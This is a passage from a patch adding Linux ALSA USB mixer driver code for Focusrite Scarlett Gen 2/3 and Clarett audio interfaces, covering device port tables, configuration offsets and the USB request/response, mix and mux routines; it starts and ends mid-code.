++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0,  6 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 24 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++static const struct scarlett2_device_info clarett_8pre_info = {
++	.config_set = SCARLETT2_CONFIG_SET_CLARETT,
++	.line_out_hw_vol = 1,
++	.level_input_count = 2,
++	.air_input_count = 8,
++
++	.line_out_descrs = {
++		"Monitor L",
++		"Monitor R",
++		NULL,
++		NULL,
++		NULL,
++		NULL,
++		"Headphones 1 L",
++		"Headphones 1 R",
++		"Headphones 2 L",
++		"Headphones 2 R",
++	},
++
++	.port_count = {
++		[SCARLETT2_PORT_TYPE_NONE]     = {  1,  0 },
++		[SCARLETT2_PORT_TYPE_ANALOGUE] = {  8, 10 },
++		[SCARLETT2_PORT_TYPE_SPDIF]    = {  2,  2 },
++		[SCARLETT2_PORT_TYPE_ADAT]     = {  8,  8 },
++		[SCARLETT2_PORT_TYPE_MIX]      = { 10, 18 },
++		[SCARLETT2_PORT_TYPE_PCM]      = { 20, 18 },
++	},
++
++	.mux_assignment = { {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
++		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
++		{ 0,                            0,  0 },
++	}, {
++		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
++		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
++		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
++		{ SCARLETT2_PORT_TYPE_NONE,     0, 22 },
++		{ 0,                            0,  0 },
++	} },
++};
++
++struct scarlett2_device_entry {
++	const u32 usb_id; /* USB device identifier */
++	const struct scarlett2_device_info *info;
++	const char *series_name;
++};
++
++static const struct scarlett2_device_entry scarlett2_devices[] = {
++	/* Supported Gen 2 devices */
++	{ USB_ID(0x1235, 0x8203), &s6i6_gen2_info, "Scarlett Gen 2" },
++	{ USB_ID(0x1235, 0x8204), &s18i8_gen2_info, "Scarlett Gen 2" },
++	{ USB_ID(0x1235, 0x8201), &s18i20_gen2_info, "Scarlett Gen 2" },
++
++	/* Supported Gen 3 devices */
++	{ USB_ID(0x1235, 0x8211), &solo_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8210), &s2i2_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8212), &s4i4_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8213), &s8i6_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8214), &s18i8_gen3_info, "Scarlett Gen 3" },
++	{ USB_ID(0x1235, 0x8215), &s18i20_gen3_info, "Scarlett Gen 3" },
++
++	/* Supported Clarett USB/Clarett+ devices */
++	{ USB_ID(0x1235, 0x8206), &clarett_2pre_info, "Clarett USB" },
++	{ USB_ID(0x1235, 0x8207), &clarett_4pre_info, "Clarett USB" },
++	{ USB_ID(0x1235, 0x8208), &clarett_8pre_info, "Clarett USB" },
++	{ USB_ID(0x1235, 0x820a), &clarett_2pre_info, "Clarett+" },
++	{ USB_ID(0x1235, 0x820b), &clarett_4pre_info, "Clarett+" },
++	{ USB_ID(0x1235, 0x820c), &clarett_8pre_info, "Clarett+" },
++
++	/* End of list */
++	{ 0, NULL },
++};
++
++/* get the starting port index number for a given port type/direction */
++static int scarlett2_get_port_start_num(
++	const int port_count[][SCARLETT2_PORT_DIRNS],
++	int direction, int port_type)
++{
++	int i, num = 0;
++
++	for (i = 0; i < port_type; i++)
++		num += port_count[i][direction];
++
++	return num;
++}
++
++/*** USB Interactions ***/
++
++/* Notifications from the interface */
++#define SCARLETT2_USB_NOTIFY_SYNC          0x00000008
++#define SCARLETT2_USB_NOTIFY_DIM_MUTE      0x00200000
++#define SCARLETT2_USB_NOTIFY_MONITOR       0x00400000
++#define SCARLETT2_USB_NOTIFY_INPUT_OTHER   0x00800000
++#define SCARLETT2_USB_NOTIFY_MONITOR_OTHER 0x01000000
++
++/* Commands for sending/receiving requests/responses */
++#define SCARLETT2_USB_CMD_INIT 0
++#define SCARLETT2_USB_CMD_REQ  2
++#define SCARLETT2_USB_CMD_RESP 3
++
++#define SCARLETT2_USB_INIT_1    0x00000000
++#define SCARLETT2_USB_INIT_2    0x00000002
++#define SCARLETT2_USB_GET_METER 0x00001001
++#define SCARLETT2_USB_GET_MIX   0x00002001
++#define SCARLETT2_USB_SET_MIX   0x00002002
++#define SCARLETT2_USB_GET_MUX   0x00003001
++#define SCARLETT2_USB_SET_MUX   0x00003002
++#define SCARLETT2_USB_GET_SYNC  0x00006004
++#define SCARLETT2_USB_GET_DATA  0x00800000
++#define SCARLETT2_USB_SET_DATA  0x00800001
++#define SCARLETT2_USB_DATA_CMD  0x00800002
++
++#define SCARLETT2_USB_CONFIG_SAVE 6
++
++#define SCARLETT2_USB_VOLUME_STATUS_OFFSET 0x31
++#define SCARLETT2_USB_METER_LEVELS_GET_MAGIC 1
++
++/* volume status is read together (matches scarlett2_config_items[1]) */
++struct scarlett2_usb_volume_status {
++	/* dim/mute buttons */
++	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
++
++	u8 pad1;
++
++	/* software volume setting */
++	s16 sw_vol[SCARLETT2_ANALOGUE_MAX];
++
++	/* actual volume of output inc. dim (-18dB) */
++	s16 hw_vol[SCARLETT2_ANALOGUE_MAX];
++
++	/* internal mute buttons */
++	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
++
++	/* sw (0) or hw (1) controlled */
++	u8 sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
++
++	u8 pad3[6];
++
++	/* front panel volume knob */
++	s16 master_vol;
++} __packed;
++
++/* Configuration parameters that can be read and written */
++enum {
++	SCARLETT2_CONFIG_DIM_MUTE = 0,
++	SCARLETT2_CONFIG_LINE_OUT_VOLUME = 1,
++	SCARLETT2_CONFIG_MUTE_SWITCH = 2,
++	SCARLETT2_CONFIG_SW_HW_SWITCH = 3,
++	SCARLETT2_CONFIG_LEVEL_SWITCH = 4,
++	SCARLETT2_CONFIG_PAD_SWITCH = 5,
++	SCARLETT2_CONFIG_MSD_SWITCH = 6,
++	SCARLETT2_CONFIG_AIR_SWITCH = 7,
++	SCARLETT2_CONFIG_STANDALONE_SWITCH = 8,
++	SCARLETT2_CONFIG_PHANTOM_SWITCH = 9,
++	SCARLETT2_CONFIG_PHANTOM_PERSISTENCE = 10,
++	SCARLETT2_CONFIG_DIRECT_MONITOR = 11,
++	SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH = 12,
++	SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE = 13,
++	SCARLETT2_CONFIG_TALKBACK_MAP = 14,
++	SCARLETT2_CONFIG_COUNT = 15
++};
++
++/* Location, size, and activation command number for the configuration
++ * parameters. Size is in bits and may be 1, 8, or 16.
++ */
++struct scarlett2_config {
++	u8 offset;
++	u8 size;
++	u8 activate;
++};
++
++static const struct scarlett2_config
++	scarlett2_config_items[SCARLETT2_CONFIG_SET_COUNT]
++			      [SCARLETT2_CONFIG_COUNT] =
++
++/* Devices without a mixer (Gen 3 Solo and 2i2) */
++{ {
++	[SCARLETT2_CONFIG_MSD_SWITCH] = {
++		.offset = 0x04, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
++		.offset = 0x05, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
++		.offset = 0x06, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_DIRECT_MONITOR] = {
++		.offset = 0x07, .size = 8, .activate = 4 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x08, .size = 1, .activate = 7 },
++
++	[SCARLETT2_CONFIG_AIR_SWITCH] = {
++		.offset = 0x09, .size = 1, .activate = 8 },
++
++/* Gen 2 devices: 6i6, 18i8, 18i20 */
++}, {
++	[SCARLETT2_CONFIG_DIM_MUTE] = {
++		.offset = 0x31, .size = 8, .activate = 2 },
++
++	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
++		.offset = 0x34, .size = 16, .activate = 1 },
++
++	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
++		.offset = 0x5c, .size = 8, .activate = 1 },
++
++	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
++		.offset = 0x66, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x7c, .size = 8, .activate = 7 },
++
++	[SCARLETT2_CONFIG_PAD_SWITCH] = {
++		.offset = 0x84, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
++		.offset = 0x8d, .size = 8, .activate = 6 },
++
++/* Gen 3 devices: 4i4, 8i6, 18i8, 18i20 */
++}, {
++	[SCARLETT2_CONFIG_DIM_MUTE] = {
++		.offset = 0x31, .size = 8, .activate = 2 },
++
++	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
++		.offset = 0x34, .size = 16, .activate = 1 },
++
++	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
++		.offset = 0x5c, .size = 8, .activate = 1 },
++
++	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
++		.offset = 0x66, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x7c, .size = 8, .activate = 7 },
++
++	[SCARLETT2_CONFIG_PAD_SWITCH] = {
++		.offset = 0x84, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_AIR_SWITCH] = {
++		.offset = 0x8c, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
++		.offset = 0x95, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
++		.offset = 0x9c, .size = 1, .activate = 8 },
++
++	[SCARLETT2_CONFIG_MSD_SWITCH] = {
++		.offset = 0x9d, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
++		.offset = 0x9e, .size = 8, .activate = 6 },
++
++	[SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH] = {
++		.offset = 0x9f, .size = 1, .activate = 10 },
++
++	[SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE] = {
++		.offset = 0xa0, .size = 1, .activate = 10 },
++
++	[SCARLETT2_CONFIG_TALKBACK_MAP] = {
++		.offset = 0xb0, .size = 16, .activate = 10 },
++
++/* Clarett USB and Clarett+ devices: 2Pre, 4Pre, 8Pre */
++}, {
++	[SCARLETT2_CONFIG_DIM_MUTE] = {
++		.offset = 0x31, .size = 8, .activate = 2 },
++
++	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
++		.offset = 0x34, .size = 16, .activate = 1 },
++
++	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
++		.offset = 0x5c, .size = 8, .activate = 1 },
++
++	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
++		.offset = 0x66, .size = 8, .activate = 3 },
++
++	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
++		.offset = 0x7c, .size = 8, .activate = 7 },
++
++	[SCARLETT2_CONFIG_AIR_SWITCH] = {
++		.offset = 0x95, .size = 8, .activate = 8 },
++
++	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
++		.offset = 0x8d, .size = 8, .activate = 6 },
++} };
++
++/* proprietary request/response format */
++struct scarlett2_usb_packet {
++	__le32 cmd;
++	__le16 size;
++	__le16 seq;
++	__le32 error;
++	__le32 pad;
++	u8 data[];
++};
++
++static void scarlett2_fill_request_header(struct scarlett2_data *private,
++					  struct scarlett2_usb_packet *req,
++					  u32 cmd, u16 req_size)
++{
++	/* sequence must go up by 1 for each request */
++	u16 seq = private->scarlett2_seq++;
++
++	req->cmd = cpu_to_le32(cmd);
++	req->size = cpu_to_le16(req_size);
++	req->seq = cpu_to_le16(seq);
++	req->error = 0;
++	req->pad = 0;
++}
++
++static int scarlett2_usb_tx(struct usb_device *dev, int interface,
++			    void *buf, u16 size)
++{
++	return snd_usb_ctl_msg(dev, usb_sndctrlpipe(dev, 0),
++			SCARLETT2_USB_CMD_REQ,
++			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_OUT,
++			0, interface, buf, size);
++}
++
++static int scarlett2_usb_rx(struct usb_device *dev, int interface,
++			    u32 usb_req, void *buf, u16 size)
++{
++	return snd_usb_ctl_msg(dev, usb_rcvctrlpipe(dev, 0),
++			usb_req,
++			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_IN,
++			0, interface, buf, size);
++}
++
++/* Send a proprietary format request to the Scarlett interface */
++static int scarlett2_usb(
++	struct usb_mixer_interface *mixer, u32 cmd,
++	void *req_data, u16 req_size, void *resp_data, u16 resp_size)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	struct usb_device *dev = mixer->chip->dev;
++	struct scarlett2_usb_packet *req, *resp = NULL;
++	size_t req_buf_size = struct_size(req, data, req_size);
++	size_t resp_buf_size = struct_size(resp, data, resp_size);
++	int err;
++
++	req = kmalloc(req_buf_size, GFP_KERNEL);
++	if (!req) {
++		err = -ENOMEM;
++		goto error;
++	}
++
++	resp = kmalloc(resp_buf_size, GFP_KERNEL);
++	if (!resp) {
++		err = -ENOMEM;
++		goto error;
++	}
++
++	mutex_lock(&private->usb_mutex);
++
++	/* build request message and send it */
++
++	scarlett2_fill_request_header(private, req, cmd, req_size);
++
++	if (req_size)
++		memcpy(req->data, req_data, req_size);
++
++	err = scarlett2_usb_tx(dev, private->bInterfaceNumber,
++			       req, req_buf_size);
++
++	if (err != req_buf_size) {
++		usb_audio_err(
++			mixer->chip,
++			"%s USB request result cmd %x was %d\n",
++			private->series_name, cmd, err);
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	/* send a second message to get the response */
++
++	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
++			       SCARLETT2_USB_CMD_RESP,
++			       resp, resp_buf_size);
++
++	/* validate the response */
++
++	if (err != resp_buf_size) {
++		usb_audio_err(
++			mixer->chip,
++			"%s USB response result cmd %x was %d expected %zu\n",
++			private->series_name, cmd, err, resp_buf_size);
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	/* cmd/seq/size should match except when initialising
++	 * seq sent = 1, response = 0
++	 */
++	if (resp->cmd != req->cmd ||
++	    (resp->seq != req->seq &&
++		(le16_to_cpu(req->seq) != 1 || resp->seq != 0)) ||
++	    resp_size != le16_to_cpu(resp->size) ||
++	    resp->error ||
++	    resp->pad) {
++		usb_audio_err(
++			mixer->chip,
++			"%s USB invalid response; "
++			   "cmd tx/rx %d/%d seq %d/%d size %d/%d "
++			   "error %d pad %d\n",
++			private->series_name,
++			le32_to_cpu(req->cmd), le32_to_cpu(resp->cmd),
++			le16_to_cpu(req->seq), le16_to_cpu(resp->seq),
++			resp_size, le16_to_cpu(resp->size),
++			le32_to_cpu(resp->error),
++			le32_to_cpu(resp->pad));
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	if (resp_data && resp_size > 0)
++		memcpy(resp_data, resp->data, resp_size);
++
++unlock:
++	mutex_unlock(&private->usb_mutex);
++error:
++	kfree(req);
++	kfree(resp);
++	return err;
++}
++
++/* Send a USB message to get data; result placed in *buf */
++static int scarlett2_usb_get(
++	struct usb_mixer_interface *mixer,
++	int offset, void *buf, int size)
++{
++	struct {
++		__le32 offset;
++		__le32 size;
++	} __packed req;
++
++	req.offset = cpu_to_le32(offset);
++	req.size = cpu_to_le32(size);
++	return scarlett2_usb(mixer, SCARLETT2_USB_GET_DATA,
++			     &req, sizeof(req), buf, size);
++}
++
++/* Send a USB message to get configuration parameters; result placed in *buf */
++static int scarlett2_usb_get_config(
++	struct usb_mixer_interface *mixer,
++	int config_item_num, int count, void *buf)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const struct scarlett2_config *config_item =
++		&scarlett2_config_items[info->config_set][config_item_num];
++	int size, err, i;
++	u8 *buf_8;
++	u8 value;
++
++	/* For byte-sized parameters, retrieve directly into buf */
++	if (config_item->size >= 8) {
++		size = config_item->size / 8 * count;
++		err = scarlett2_usb_get(mixer, config_item->offset, buf, size);
++		if (err < 0)
++			return err;
++		if (size == 2) {
++			u16 *buf_16 = buf;
++
++			for (i = 0; i < count; i++, buf_16++)
++				*buf_16 = le16_to_cpu(*(__le16 *)buf_16);
++		}
++		return 0;
++	}
++
++	/* For bit-sized parameters, retrieve into value */
++	err = scarlett2_usb_get(mixer, config_item->offset, &value, 1);
++	if (err < 0)
++		return err;
++
++	/* then unpack from value into buf[] */
++	buf_8 = buf;
++	for (i = 0; i < 8 && i < count; i++, value >>= 1)
++		*buf_8++ = value & 1;
++
++	return 0;
++}
++
++/* Send SCARLETT2_USB_DATA_CMD SCARLETT2_USB_CONFIG_SAVE */
++static void scarlett2_config_save(struct usb_mixer_interface *mixer)
++{
++	__le32 req = cpu_to_le32(SCARLETT2_USB_CONFIG_SAVE);
++
++	int err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
++				&req, sizeof(u32),
++				NULL, 0);
++	if (err < 0)
++		usb_audio_err(mixer->chip, "config save failed: %d\n", err);
++}
++
++/* Delayed work to save config */
++static void scarlett2_config_save_work(struct work_struct *work)
++{
++	struct scarlett2_data *private =
++		container_of(work, struct scarlett2_data, work.work);
++
++	scarlett2_config_save(private->mixer);
++}
++
++/* Send a USB message to set a SCARLETT2_CONFIG_* parameter */
++static int scarlett2_usb_set_config(
++	struct usb_mixer_interface *mixer,
++	int config_item_num, int index, int value)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const struct scarlett2_config *config_item =
++	       &scarlett2_config_items[info->config_set][config_item_num];
++	struct {
++		__le32 offset;
++		__le32 bytes;
++		__le32 value;
++	} __packed req;
++	__le32 req2;
++	int offset, size;
++	int err;
++
++	/* Cancel any pending NVRAM save */
++	cancel_delayed_work_sync(&private->work);
++
++	/* Convert config_item->size in bits to size in bytes and
++	 * calculate offset
++	 */
++	if (config_item->size >= 8) {
++		size = config_item->size / 8;
++		offset = config_item->offset + index * size;
++
++	/* If updating a bit, retrieve the old value, set/clear the
++	 * bit as needed, and update value
++	 */
++	} else {
++		u8 tmp;
++
++		size = 1;
++		offset = config_item->offset;
++
++		err = scarlett2_usb_get(mixer, offset, &tmp, 1);
++		if (err < 0)
++			return err;
++
++		if (value)
++			tmp |= (1 << index);
++		else
++			tmp &= ~(1 << index);
++
++		value = tmp;
++	}
++
++	/* Send the configuration parameter data */
++	req.offset = cpu_to_le32(offset);
++	req.bytes = cpu_to_le32(size);
++	req.value = cpu_to_le32(value);
++	err = scarlett2_usb(mixer, SCARLETT2_USB_SET_DATA,
++			    &req, sizeof(u32) * 2 + size,
++			    NULL, 0);
++	if (err < 0)
++		return err;
++
++	/* Activate the change */
++	req2 = cpu_to_le32(config_item->activate);
++	err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
++			    &req2, sizeof(req2), NULL, 0);
++	if (err < 0)
++		return err;
++
++	/* Schedule the change to be written to NVRAM */
++	if (config_item->activate != SCARLETT2_USB_CONFIG_SAVE)
++		schedule_delayed_work(&private->work, msecs_to_jiffies(2000));
++
++	return 0;
++}
++
++/* Send a USB message to get sync status; result placed in *sync */
++static int scarlett2_usb_get_sync_status(
++	struct usb_mixer_interface *mixer,
++	u8 *sync)
++{
++	__le32 data;
++	int err;
++
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_SYNC,
++			    NULL, 0, &data, sizeof(data));
++	if (err < 0)
++		return err;
++
++	*sync = !!data;
++	return 0;
++}
++
++/* Send a USB message to get volume status; result placed in *buf */
++static int scarlett2_usb_get_volume_status(
++	struct usb_mixer_interface *mixer,
++	struct scarlett2_usb_volume_status *buf)
++{
++	return scarlett2_usb_get(mixer, SCARLETT2_USB_VOLUME_STATUS_OFFSET,
++				 buf, sizeof(*buf));
++}
++
++/* Send a USB message to get the volumes for all inputs of one mix
++ * and put the values into private->mix[]
++ */
++static int scarlett2_usb_get_mix(struct usb_mixer_interface *mixer,
++				 int mix_num)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	int num_mixer_in =
++		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
++	int err, i, j, k;
++
++	struct {
++		__le16 mix_num;
++		__le16 count;
++	} __packed req;
++
++	__le16 data[SCARLETT2_INPUT_MIX_MAX];
++
++	req.mix_num = cpu_to_le16(mix_num);
++	req.count = cpu_to_le16(num_mixer_in);
++
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MIX,
++			    &req, sizeof(req),
++			    data, num_mixer_in * sizeof(u16));
++	if (err < 0)
++		return err;
++
++	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++) {
++		u16 mixer_value = le16_to_cpu(data[i]);
++
++		for (k = 0; k < SCARLETT2_MIXER_VALUE_COUNT; k++)
++			if (scarlett2_mixer_values[k] >= mixer_value)
++				break;
++		if (k == SCARLETT2_MIXER_VALUE_COUNT)
++			k = SCARLETT2_MIXER_MAX_VALUE;
++		private->mix[j] = k;
++	}
++
++	return 0;
++}
++
++/* Send a USB message to set the volumes for all inputs of one mix
++ * (values obtained from private->mix[])
++ */
++static int scarlett2_usb_set_mix(struct usb_mixer_interface *mixer,
++				 int mix_num)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	struct {
++		__le16 mix_num;
++		__le16 data[SCARLETT2_INPUT_MIX_MAX];
++	} __packed req;
++
++	int i, j;
++	int num_mixer_in =
++		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
++
++	req.mix_num = cpu_to_le16(mix_num);
++
++	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++)
++		req.data[i] = cpu_to_le16(
++			scarlett2_mixer_values[private->mix[j]]
++		);
++
++	return scarlett2_usb(mixer, SCARLETT2_USB_SET_MIX,
++			     &req, (num_mixer_in + 1) * sizeof(u16),
++			     NULL, 0);
++}
++
++/* Convert a port number index (per info->port_count) to a hardware ID */
++static u32 scarlett2_mux_src_num_to_id(
++	const int port_count[][SCARLETT2_PORT_DIRNS], int num)
++{
++	int port_type;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		if (num < port_count[port_type][SCARLETT2_PORT_IN])
++			return scarlett2_ports[port_type].id | num;
++		num -= port_count[port_type][SCARLETT2_PORT_IN];
++	}
++
++	/* Oops */
++	return 0;
++}
++
++/* Convert a hardware ID to a port number index */
++static u32 scarlett2_mux_id_to_num(
++	const int port_count[][SCARLETT2_PORT_DIRNS], int direction, u32 id)
++{
++	int port_type;
++	int port_num = 0;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		int base = scarlett2_ports[port_type].id;
++		int count = port_count[port_type][direction];
++
++		if (id >= base && id < base + count)
++			return port_num + id - base;
++		port_num += count;
++	}
++
++	/* Oops */
++	return -1;
++}
++
++/* Convert one mux entry from the interface and load into private->mux[] */
++static void scarlett2_usb_populate_mux(struct scarlett2_data *private,
++				       u32 mux_entry)
++{
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++
++	int dst_idx, src_idx;
++
++	dst_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_OUT,
++					  mux_entry & 0xFFF);
++	if (dst_idx < 0)
++		return;
++
++	if (dst_idx >= private->num_mux_dsts) {
++		usb_audio_err(private->mixer->chip,
++			"BUG: scarlett2_mux_id_to_num(%06x, OUT): %d >= %d",
++			mux_entry, dst_idx, private->num_mux_dsts);
++		return;
++	}
++
++	src_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_IN,
++					  mux_entry >> 12);
++	if (src_idx < 0)
++		return;
++
++	if (src_idx >= private->num_mux_srcs) {
++		usb_audio_err(private->mixer->chip,
++			"BUG: scarlett2_mux_id_to_num(%06x, IN): %d >= %d",
++			mux_entry, src_idx, private->num_mux_srcs);
++		return;
++	}
++
++	private->mux[dst_idx] = src_idx;
++}
++
++/* Send USB message to get mux inputs and then populate private->mux[] */
++static int scarlett2_usb_get_mux(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	int count = private->num_mux_dsts;
++	int err, i;
++
++	struct {
++		__le16 num;
++		__le16 count;
++	} __packed req;
++
++	__le32 data[SCARLETT2_MUX_MAX];
++
++	private->mux_updated = 0;
++
++	req.num = 0;
++	req.count = cpu_to_le16(count);
++
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MUX,
++			    &req, sizeof(req),
++			    data, count * sizeof(u32));
++	if (err < 0)
++		return err;
++
++	for (i = 0; i < count; i++)
++		scarlett2_usb_populate_mux(private, le32_to_cpu(data[i]));
++
++	return 0;
++}
++
++/* Send USB messages to set mux inputs */
++static int scarlett2_usb_set_mux(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int table;
++
++	struct {
++		__le16 pad;
++		__le16 num;
++		__le32 data[SCARLETT2_MUX_MAX];
++	} __packed req;
++
++	req.pad = 0;
++
++	/* set mux settings for each rate */
++	for (table = 0; table < SCARLETT2_MUX_TABLES; table++) {
++		const struct scarlett2_mux_entry *entry;
++
++		/* i counts over the output array */
++		int i = 0, err;
++
++		req.num = cpu_to_le16(table);
++
++		/* loop through each entry */
++		for (entry = info->mux_assignment[table];
++		     entry->count;
++		     entry++) {
++			int j;
++			int port_type = entry->port_type;
++			int port_idx = entry->start;
++			int mux_idx = scarlett2_get_port_start_num(port_count,
++				SCARLETT2_PORT_OUT, port_type) + port_idx;
++			int dst_id = scarlett2_ports[port_type].id + port_idx;
++
++			/* Empty slots */
++			if (!dst_id) {
++				for (j = 0; j < entry->count; j++)
++					req.data[i++] = 0;
++				continue;
++			}
++
++			/* Non-empty mux slots use the lower 12 bits
++			 * for the destination and next 12 bits for
++			 * the source
++			 */
++			for (j = 0; j < entry->count; j++) {
++				int src_id = scarlett2_mux_src_num_to_id(
++					port_count, private->mux[mux_idx++]);
++				req.data[i++] = cpu_to_le32(dst_id |
++							    src_id << 12);
++				dst_id++;
++			}
++		}
++
++		err = scarlett2_usb(mixer, SCARLETT2_USB_SET_MUX,
++				    &req, (i + 1) * sizeof(u32),
++				    NULL, 0);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
++
++/* Send USB message to get meter levels */
++static int scarlett2_usb_get_meter_levels(struct usb_mixer_interface *mixer,
++					  u16 num_meters, u16 *levels)
++{
++	struct {
++		__le16 pad;
++		__le16 num_meters;
++		__le32 magic;
++	} __packed req;
++	u32 resp[SCARLETT2_MAX_METERS];
++	int i, err;
++
++	req.pad = 0;
++	req.num_meters = cpu_to_le16(num_meters);
++	req.magic = cpu_to_le32(SCARLETT2_USB_METER_LEVELS_GET_MAGIC);
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_METER,
++			    &req, sizeof(req), resp, num_meters * sizeof(u32));
++	if (err < 0)
++		return err;
++
++	/* copy, convert to u16 */
++	for (i = 0; i < num_meters; i++)
++		levels[i] = resp[i];
++
++	return 0;
++}
++
++/*** Control Functions ***/
++
++/* helper function to create a new control */
++static int scarlett2_add_new_ctl(struct usb_mixer_interface *mixer,
++				 const struct snd_kcontrol_new *ncontrol,
++				 int index, int channels, const char *name,
++				 struct snd_kcontrol **kctl_return)
++{
++	struct snd_kcontrol *kctl;
++	struct usb_mixer_elem_info *elem;
++	int err;
++
++	elem = kzalloc(sizeof(*elem), GFP_KERNEL);
++	if (!elem)
++		return -ENOMEM;
++
++	/* We set USB_MIXER_BESPOKEN type, so that the core USB mixer code
++	 * ignores them for resume and other operations.
++	 * Also, the head.id field is set to 0, as we don't use this field.
++	 */
++	elem->head.mixer = mixer;
++	elem->control = index;
++	elem->head.id = 0;
++	elem->channels = channels;
++	elem->val_type = USB_MIXER_BESPOKEN;
++
++	kctl = snd_ctl_new1(ncontrol, elem);
++	if (!kctl) {
++		kfree(elem);
++		return -ENOMEM;
++	}
++	kctl->private_free = snd_usb_mixer_elem_free;
++
++	strscpy(kctl->id.name, name, sizeof(kctl->id.name));
++
++	err = snd_usb_mixer_add_control(&elem->head, kctl);
++	if (err < 0)
++		return err;
++
++	if (kctl_return)
